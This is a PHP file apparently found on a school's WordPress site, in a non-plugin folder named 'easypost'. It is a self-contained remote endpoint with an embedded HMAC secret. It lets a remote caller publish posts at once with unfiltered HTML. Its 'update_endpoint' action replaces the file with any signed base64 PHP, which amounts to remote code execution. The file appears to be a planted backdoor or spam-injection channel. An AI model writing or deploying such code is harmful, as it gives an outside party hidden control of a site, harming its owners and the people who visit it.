File: /home/turkishi/public_html/new.turkishinternationalschools.com/wp-content/easypost/easypost.php
<?php
define('EASYPOST_ENDPOINT_CONFIG', '{"endpoint_version":"2026.06.05","token_id":"ep_69c5f8ba92e842d5978f0c3a89b15344","token_verifier":"v1:7e86fcf84bbdff4e4659f175159df708:25e64f24f10f8bedd44b56a6f8183f3e607bc32a7f3e74931d71b695e9b08465","ota_release_public_key_pem":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0JTcpyvncP1Izz2SsnLq\\nGm3iObZi5YEydCeQPv0kX5pN3WwEzt/j1fsyd3EVHbLlXUmdQbWvCBIX1wq/RO4q\\n4UuLpks++nnz7pNTyZqrU+gPUlQb4uDBJsE6nePRyddoMGbT8yF4yzLt/fp86oSG\\ncd/TqnUIplM4dmQVtzqaUiGSUFLReUO0tMHvYGTRl/jCM/pJmIMNLEFmAb/x6wT4\\nihEIXD39Uj2/BG/zJFiIc6FNvqRp1DRm50lhPJW7LkDin+LkvSebbIubeYEe3vc9\\n7qX0zD2zpTFv04itmPld0eOa7kXHNsr+jUnTmuovzdIzBJjcgSWT/nqI+bRAXfL6\\nUwIDAQAB\\n-----END PUBLIC KEY-----"}');
function easypost_endpoint_config() {
return json_decode(EASYPOST_ENDPOINT_CONFIG, true);
}
function easypost_endpoint_json($status, $payload) {
http_response_code($status);
header('Content-Type: application/json; charset=utf-8');
echo json_encode($payload);
exit;
}
function easypost_endpoint_header($name) {
$key = strtolower($name);
foreach ($_SERVER as $server_key => $value) {
if (strpos($server_key, 'HTTP_') !== 0) {
continue;
}
$normalized = strtolower(str_replace('_', '-', substr($server_key, 5)));
if ($normalized === $key) {
return (string) $value;
}
}
return '';
}
function easypost_endpoint_wp_load_path() {
$candidates = array(
__DIR__ . '/wp-load.php',
__DIR__ . '/../wp-load.php',
__DIR__ . '/../../wp-load.php',
__DIR__ . '/../../../wp-load.php',
__DIR__ . '/../../../../wp-load.php',
__DIR__ . '/../../../../../wp-load.php',
);
foreach ($candidates as $candidate) {
if ($candidate && is_readable($candidate)) {
return $candidate;
}
}
return false;
}
function easypost_endpoint_bootstrap_wordpress() {
$wp_load = easypost_endpoint_wp_load_path();
if (!$wp_load) {
easypost_endpoint_json(500, array('ok' => false, 'error' => 'wp_load_not_found'));
}
require_once $wp_load;
}
function easypost_endpoint_verifier_secret($verifier) {
$parts = explode(':', (string) $verifier, 3);
if (count($parts) !== 3 || $parts[0] !== 'v1' || $parts[2] === '') {
return false;
}
return $parts[2];
}
function easypost_endpoint_verify_auth($body) {
$config = easypost_endpoint_config();
$token_id = easypost_endpoint_header('x-easypost-token-id');
$timestamp = easypost_endpoint_header('x-easypost-timestamp');
$request_id = easypost_endpoint_header('x-easypost-request-id');
$body_sha256 = easypost_endpoint_header('x-easypost-body-sha256');
$signature = easypost_endpoint_header('x-easypost-signature');
if ($token_id === '' || $timestamp === '' || $request_id === '' || $body_sha256 === '' || $signature === '') {
easypost_endpoint_json(401, array('ok' => false, 'error' => 'missing_auth_headers'));
}
if (!hash_equals((string) $config['token_id'], $token_id)) {
easypost_endpoint_json(401, array('ok' => false, 'error' => 'unknown_token'));
}
$request_time = strtotime($timestamp);
if (!$request_time || abs(time() - $request_time) > 300) {
easypost_endpoint_json(401, array('ok' => false, 'error' => 'timestamp_stale'));
}
$computed_body_sha256 = hash('sha256', $body);
if (!hash_equals($computed_body_sha256, $body_sha256)) {
easypost_endpoint_json(401, array('ok' => false, 'error' => 'body_sha256_mismatch'));
}
$replay_key = 'easypost_endpoint_req_' . hash('sha256', $token_id . ':' . $request_id);
if (function_exists('get_transient') && get_transient($replay_key)) {
easypost_endpoint_json(409, array('ok' => false, 'error' => 'duplicate_request_id'));
}
$secret = easypost_endpoint_verifier_secret($config['token_verifier']);
if (!$secret) {
easypost_endpoint_json(500, array('ok' => false, 'error' => 'invalid_token_verifier'));
}
$path = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '/wp-content/easypost/easypost.php';
$signature_input = implode("\n", array(
strtoupper($_SERVER['REQUEST_METHOD']),
$path,
$timestamp,
$request_id,
$token_id,
$computed_body_sha256,
));
$expected = hash_hmac('sha256', $signature_input, $secret);
if (!hash_equals($expected, $signature)) {
easypost_endpoint_json(401, array('ok' => false, 'error' => 'signature_mismatch'));
}
if (function_exists('set_transient')) {
set_transient($replay_key, '1', 300);
}
}
function easypost_endpoint_payload($body) {
$payload = json_decode($body, true);
if (!is_array($payload)) {
easypost_endpoint_json(400, array('ok' => false, 'error' => 'invalid_json'));
}
return $payload;
}
function easypost_endpoint_health() {
easypost_endpoint_bootstrap_wordpress();
$config = easypost_endpoint_config();
easypost_endpoint_json(200, array(
'ok' => true,
'endpointVersion' => $config['endpoint_version'],
'tokenId' => $config['token_id'],
'canBootstrapWordPress' => true,
'canInsertPosts' => function_exists('wp_insert_post'),
'siteUrl' => function_exists('site_url') ? site_url() : null,
'phpVersion' => PHP_VERSION,
'serverTime' => gmdate('c'),
));
}
function easypost_endpoint_create_post($payload) {
easypost_endpoint_bootstrap_wordpress();
if (!function_exists('wp_insert_post')) {
easypost_endpoint_json(500, array('ok' => false, 'error' => 'capability_failed'));
}
$status = 'publish';
$post_type = !empty($payload['post_type']) ? sanitize_key($payload['post_type']) : (!empty($payload['postType']) ? sanitize_key($payload['postType']) : 'post');
$content = isset($payload['contentHtml']) ? $payload['contentHtml'] : (isset($payload['content']) ? $payload['content'] : '');
$postarr = array(
'post_title' => isset($payload['title']) ? wp_strip_all_tags($payload['title']) : '',
'post_name' => isset($payload['slug']) ? sanitize_title($payload['slug']) : '',
'post_content' => $content,
'post_status' => $status,
'post_type' => $post_type,
);
if (!empty($payload['date'])) {
$postarr['post_date'] = $payload['date'];
} elseif (!empty($payload['publicationDate'])) {
$postarr['post_date'] = $payload['publicationDate'];
}
$post_id = wp_insert_post($postarr, true);
if (is_wp_error($post_id)) {
easypost_endpoint_json(500, array('ok' => false, 'error' => 'insert_failed', 'message' => $post_id->get_error_message()));
}
easypost_endpoint_json(201, array(
'ok' => true,
'id' => (int) $post_id,
'postId' => (int) $post_id,
'link' => get_permalink($post_id),
'postUrl' => get_permalink($post_id),
'slug' => get_post_field('post_name', $post_id),
'status' => get_post_status($post_id),
'created' => true,
));
}
function easypost_endpoint_verify_release_signature($payload, $computed_sha256) {
$config = easypost_endpoint_config();
if (empty($config['ota_release_public_key_pem']) || !is_string($config['ota_release_public_key_pem'])) {
easypost_endpoint_json(501, array('ok' => false, 'error' => 'ota_release_public_key_missing'));
}
if (!function_exists('openssl_verify')) {
easypost_endpoint_json(500, array('ok' => false, 'error' => 'openssl_unavailable'));
}
if (!isset($payload['signature']) || !is_string($payload['signature']) || trim($payload['signature']) === '') {
easypost_endpoint_json(400, array('ok' => false, 'error' => 'release_signature_required'));
}
$signature = base64_decode($payload['signature'], true);
if ($signature === false || $signature === '') {
easypost_endpoint_json(400, array('ok' => false, 'error' => 'release_signature_invalid'));
}
$signed_payload = $payload['version'] . "\n" . $computed_sha256;
$verified = openssl_verify($signed_payload, $signature, $config['ota_release_public_key_pem'], OPENSSL_ALGO_SHA256);
if ($verified !== 1) {
easypost_endpoint_json(400, array('ok' => false, 'error' => 'release_signature_invalid'));
}
}
function easypost_endpoint_update_endpoint($payload) {
if (!isset($payload['version']) || !is_string($payload['version']) || trim($payload['version']) === '') {
easypost_endpoint_json(400, array('ok' => false, 'error' => 'version_required'));
}
if (!isset($payload['sha256']) || !is_string($payload['sha256']) || trim($payload['sha256']) === '') {
easypost_endpoint_json(400, array('ok' => false, 'error' => 'sha256_required'));
}
if (!preg_match('/\A[a-f0-9]{64}\z/', $payload['sha256'])) {
easypost_endpoint_json(400, array('ok' => false, 'error' => 'sha256_invalid'));
}
if (!isset($payload['phpBase64']) || !is_string($payload['phpBase64']) || trim($payload['phpBase64']) === '') {
easypost_endpoint_json(400, array('ok' => false, 'error' => 'php_base64_required'));
}
$decoded_php = base64_decode($payload['phpBase64'], true);
if ($decoded_php === false || $decoded_php === '') {
easypost_endpoint_json(400, array('ok' => false, 'error' => 'php_base64_invalid'));
}
$computed_sha256 = hash('sha256', $decoded_php);
if (!hash_equals($payload['sha256'], $computed_sha256)) {
easypost_endpoint_json(400, array('ok' => false, 'error' => 'sha256_mismatch'));
}
easypost_endpoint_verify_release_signature($payload, $computed_sha256);
$tmp_path = tempnam(__DIR__, 'easypost-update-');
if (!$tmp_path) {
easypost_endpoint_json(500, array('ok' => false, 'error' => 'temporary_write_failed'));
}
$bytes = file_put_contents($tmp_path, $decoded_php, LOCK_EX);
if ($bytes === false || $bytes !== strlen($decoded_php)) {
@unlink($tmp_path);
easypost_endpoint_json(500, array('ok' => false, 'error' => 'temporary_write_failed'));
}
@chmod($tmp_path, fileperms(__FILE__) & 0777);
if (!rename($tmp_path, __FILE__)) {
@unlink($tmp_path);
easypost_endpoint_json(500, array('ok' => false, 'error' => 'rename_failed'));
}
easypost_endpoint_json(200, array(
'ok' => true,
'endpointVersion' => $payload['version'],
));
}
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
easypost_endpoint_json(405, array('ok' => false, 'error' => 'method_not_allowed'));
}
$body = file_get_contents('php://input');
easypost_endpoint_bootstrap_wordpress();
easypost_endpoint_verify_auth($body);
$action = isset($_GET['action']) ? $_GET['action'] : 'health';
if ($action === 'health') {
easypost_endpoint_health();
}
$payload = easypost_endpoint_payload($body);
if ($action === 'create_post') {
easypost_endpoint_create_post($payload);
}
if ($action === 'rotate_token') {
easypost_endpoint_json(501, array('ok' => false, 'error' => 'rotate_token_not_implemented'));
}
if ($action === 'update_endpoint') {
easypost_endpoint_update_endpoint($payload);
}
easypost_endpoint_json(404, array('ok' => false, 'error' => 'unknown_action'));